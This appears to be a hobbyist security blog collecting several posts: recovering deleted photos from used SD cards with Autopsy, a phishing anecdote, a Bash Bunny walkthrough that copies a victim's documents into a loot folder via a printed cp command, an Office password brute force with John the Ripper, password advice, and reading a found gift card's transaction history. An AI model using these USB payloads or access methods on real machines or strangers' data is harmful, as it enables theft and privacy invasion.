Resurrecting Carelessly Discarded Data

I picked up a large batch of MicroSD cards and adapters for an upcoming project. I’m cheap, and the data reliability isn’t critical, so I picked up used cards on ebay. After I made the purchase, it occurred to me that this was a potential teaching moment, both to freshen my own skills and to raise awareness for others who may not pay as much attention as those of us in the field.

TLDR: If you don’t know how deleted your data really is, don’t give, sell or return writable media. Either learn how to securely erase your data and confirm that it has been erased, or toss it in a fire.

So before they showed up, I installed the latest version of Autopsy on a fresh Windows box. Fresh because, well, just like I’m assuming that others might have been careless in data deletion, I have to guard against being careless about sticking random cards in my machines.

So they arrived. The moment of truth was here. I pulled out the first MicroSD, stuck it in the first adapter, and inserted it into a USB slot on the PC.

Predictably, it pops up as a blank, formatted card. Let’s see what Autopsy sees…

Let’s see, it’s been a while since I played with Autopsy. Let’s go with:
* Add Data Source

Let’s call it
* Card001
* Local Disk
* Select Disk. On my machine it showed up as H:
<Next>

I’m leaving everything checked here. If this was true forensics I might be more choosy, but I’m not.

Looks like the first test is examining the file system. “Adding $OrphanFiles,” it says.

After that, it tells me file analysis has started. I can hit finish, but I can tell by the progress bar in the lower right that it’s still analyzing stuff. This process goes on for a few minutes.

After the file analysis phase, it moves on to the data integrity phase.

Finally it’s done. I browse the card in the data source tree. Ooh, look, there are recovered files in the $CarvedFiles folder! Baby pics, family pics, and yes… porn. Folks, I recycled porn from the very first used SD card I tested.

So I’m up to card 28 now, and a few patterns emerged.

The metadata shows a strong preponderance of Nokia 5300 as the image source. This tells me these cards were likely sold by a shop servicing Nokia phones. The mp3 and video content I’ve extracted so far shows a strong trend toward Spanish-speaking content, and a few of the images with recognizable stuff on them actually mentioned Mexico.

I need to dig deeper into metadata, but visually it appears that at least some of the porn is homemade. Some of the cards had porn images which had likely been downloaded from the internet, as I discovered by running through through TinEye.

I’ve really got to refresh my Autopsy skills. I don’t do forensics for a living, but it helps to know the workflow of someone who does, in case you might one day find yourself protecting yourself from an enthusiastic forensic investigator.

Further learning: There are hash sets you can obtain that can validate files you find against known file hashes. Which might be the prudent thing to do if you don’t know what your found media might contain. Might be good to know if you’re handling CSAM before you actually view CSAM.

Just Because I’m Paranoid…

Doesn’t mean they’re not out to get me.

So I ordered some more PCBs, what, ten days ago now. This evening after dinner I was thinking, “wow, I should have gotten a ship notice by now…” then, a few minutes later, it showed up. That’s not the paranoid part.

The shipping notice from the fab house was normal, package on the way via DHL, etc.

An hour or so later, I got a phishing email purporting to be from DHL.

I get lots of phishing emails. I’m not going to categorize them based on quality, because to me, almost all phishing emails are low effort.

But I think it’s strange that I, who normally only gets DHL packages a couple times per year, get a DHL phishing email within an hour or so of an actual DHL package being sent my way.

Now I’m not saying there’s a connection, but if there is a connection, then either:
1) Someone’s got access to the fab house records;
2) Someone’s got access to DHL records; or
3) Someone’s got access to the “Deliveries” tracking app. (I entered the tracking info into that app like I do every time I learn of a package enroute). I suspect this, the rogue phone app, is most likely.

If I’ve got any phishing expert mutuals that have anything to share, I’m all ears.

Bashbunny — still fun in 2021? (part 1)

I decided to dust off my Hak5 field kit and refamiliarize myself with all the tools. I have the bashbunny, the LAN turtle, the rubber ducky, and a bunch of utility adapters. I also have a wifi cactus in there, but I’m pretty sure I picked that up separately.

I started with the Bashbunny, since it’s so versatile. I won’t address advanced topics like locked PCs in this post, this is very basic bashbunny talk. So the scope here is “some dumbass left me unmonitored access to a PC.” Either unattended, or “here, you drive while I go get a drink.” Yeah, don’t do that with someone who might have these tools and tendencies.

So the first thing I noticed was that it was out of date. Fortunately, Hak5 has very usable instructions and tools for making it current.

So I went through all that process, bringing my payloads and firmware up to current levels. It was a fun exercise.

The first script I ran was recon/MacProfiler. I set the Bashbunny to Arm, copied the payload.txt into switch1/, ejected it, switched the Bashbunny to position 1, and reinserted it.

Ran once, and it left the bashbunny mounted. The second time I ran it, it successfully ejected itself, which is important if you’re trying to be a bit stealthy. At some point I’ll investigate that further.

It worked well. It gathered a list of all of the /Applications on my MacBook Air, a list of all users, and all the networking information I might need. Oh, and a list of things that startup automatically. All of this is tremendously useful for recon, so that you can craft a later attack for next time you have access to the same PC.

Next, I tried macinfograbber. Similar concept, but it’s specifically crafted to grab a copy of any spreadsheets (xls/xlsx) in the user’s Documents directory. By extension, of course, this could mean whatever type of files you’re specifically aiming for.

(arm) (eject) (switch) (reinsert)

OK, this did some stuff, then ended with a red LED indicator on the bashbunny. This translates to “no files found” according to the script. Kind of surprising. Do I really have no xls/xlsx files in my Documents directory? Let’s see… Hmmm, yep. I do. Why did it fail? At first I thought maybe it was spaces in the filename and a poorly-written script, but I renamed it to a single word and tried again and it continued to fail.

So I dug deeper. Here’s the command that macinfograbber uses to grab those files:

cp ~/Documents/{*.xlsx,*.xls,*.pdf}  /Volumes/BashBunny/loot/MacLoot/xlsx/

And here’s the problem. I’m assuming these scripts were written back in 2017 when the Bashbunny was fresh. In 2019, Apple switched from bash to zsh on the Macs. And apparently, zsh fails this command if any glob fails for safety reasons. So that line will need to be rewritten, or just broken out into individual commands.

More on the Bashbunny later. I plan to dig deep through the whole payload library for a 2021 refresh, because it’s still useful. Although you might want to remember to take your USB-C adapter with you for modern MacBooks. 🙂

TIL about john the ripper and trigraph frequencies.

I have an assignment to crack an Office password for a document. I have tried using john and hashcat with several large wordlists, and had no luck, so I decided to go all-in and just leave a Kali instance running john in incremental (brute force) mode for “as long as it takes.” It’s been two days so far.

I have it running within ‘screen’ so that I can occasionally login to the system remotely to check progress without risk of losing it. I was excited at one point yesterday seeing that it was in the middle of checking seven-character passwords, but then I checked back later and it was checking six-character passwords. This morning, five. I wanted to understand — I assumed (without doing a deep dive on the mechanics) that it would just go literally incrementally. aaaaa, aaaab, aaaac, etc. That was an incorrect assumption.

John’s incremental mode actually operates on “trigraph frequencies.” While I understand the concept of trigraph frequencies (certain sets of three characters occur more frequently than others, and this can help with decryption efforts, I have my doubts as to whether this helps in cracking passwords. Passwords aren’t always natural speech, after all.

Anyhow, it’s been running for two days now, and I’ll post about it again when it’s done just to give an idea of whether it’s successful, and if so, how long it took vs the complexity of the password.

If anyone else wants to try using similar or other methods, let me know, and I’ll send you the hash (generated by office2john). No, I can’t send you the actual document. That would be unethical.

You’re Not Clever: Password Patterns Exposed

Maybe you were reluctant to get on the password manager bandwagon. Passwords are inherently dangerous. Storing them in the cloud, you worry about breaches, you worry about losing access, etc. So you devised a clever pattern you thought would help you weather the storm until we finally get rid of passwords forever.

Maybe your password is a common word, then the first few letters of the site name. Long enough to avoid being guessed via brute force, and complex enough as well.

And that’s worked well for you for the past few years. You’re sitting pretty and haven’t been breached in a widespread attack.

YET.

Here’s the thing — when you use a pattern approach, every breach puts you more at risk, exposing your pattern. So far the bad actors have only been brute forcing using the breach lists (that we know of). It’s only a matter of time, if they haven’t started already, that they start cross referencing your user accounts from the various breach lists to get a per-user password list. Once that happens, inspecting those subsets for patterns will be trivial, and they will own ALL of your accounts.

Get out now, while you can. MFA where possible, long phrases if MFA is not available, 16-character complexity when long phrases don’t work.

If you don’t trust cloud password managers, use something like Keepass, but keep multiple backups in a safe place in case of corruption.

Gift Card Security

Do you use gift cards?  Some people use them to anonymize their purchases, others because financial situations have forced them to.  Take a moment to think about securing them.

Stopped at Wawa on the way home last night, spotted a Vanilla gift card on top of the recycling bin.  Why the owner didn’t put it completely in the trash I don’t know, but because I’m dabbler in magstripe and RFID card security, I always pick up stray cards. 

So I took it home, and was able to log into its account, which had not been secured.  It painted a sad picture.

10/8 2:05PM – bought gift card $100
10/8 9:50PM – “Any Lab Test Now” $40 (going rate for a 5-panel drug test)
10/9 2:05AM – Target, $42.90
10/9 10:48AM – Chick-Fil-A $8.43
10/10 6:11PM – Wawa $8.27

So this person bought (or received) a gift card, paid for his or her drug test, bought something at Target, ate at Chick-Fil-A, then spent his or her last $8.27 on gas, zeroing the card out in two days, and then leaving it in plain sight.